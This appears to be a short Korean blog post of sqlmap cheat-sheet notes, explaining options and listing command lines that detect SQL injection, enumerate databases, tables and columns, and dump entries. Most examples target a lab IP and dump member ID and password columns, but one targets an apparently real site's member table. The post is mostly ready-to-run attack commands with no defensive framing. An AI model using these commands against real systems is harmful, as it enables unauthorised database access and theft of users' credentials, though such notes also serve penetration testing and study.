==================
SQLMAP sql injectionor
download : https://github.com/sqlmapproject/sqlmap
usage : https://github.com/sqlmapproject/sqlmap/wiki/Usage
==================
GET/POST, 헤더정보 포함 텍스트 파일 생성
(예, sample.txt)
sqlmap.py -r sample.txt --dbs --timeout 5
-r : 생성한 텍스트파일 지정
--dbs : 데이터베이스 검색
--timeout : 응답 기다리는 시간 5
데이터베이스 덤프
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
--dump Dump DBMS database table entries
실행예> sqlmap.py -r a.txt --timeout 5 -D mf.webgm.co.kr -T g4_member --dump
./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" --dbs //dbs가져오기
./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" --tables // tables 가져오기
./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" --columns //columns 가져오기
./sqlmap.py -u "http://192.168.92.128:9090/board_view.asp?num=33" -v0 --dbms "Microsoft SQL Server 2005" --os "Windows" -D "board" -T "member" -C "bId","bPass" --dump // 값들가져오기
'Web_Hacking' 카테고리의 다른 글
| [ python ] whitehat 웹해킹 문제 블라인드 인젝션 exploit 코드 (0) | 2015.10.24 |
|---|---|
| php mail function php injection (0) | 2014.11.08 |
| 파일내에 exec 계열 함수 사용 여부 (내용으로검색) (0) | 2013.10.05 |
| [white hacking] 화이트 해킹대회 web PPPPAAAASSSWWW... (150Point) (0) | 2013.09.15 |
| [White Hacking] Serial2 web(150 point) Write-up (0) | 2013.09.15 |
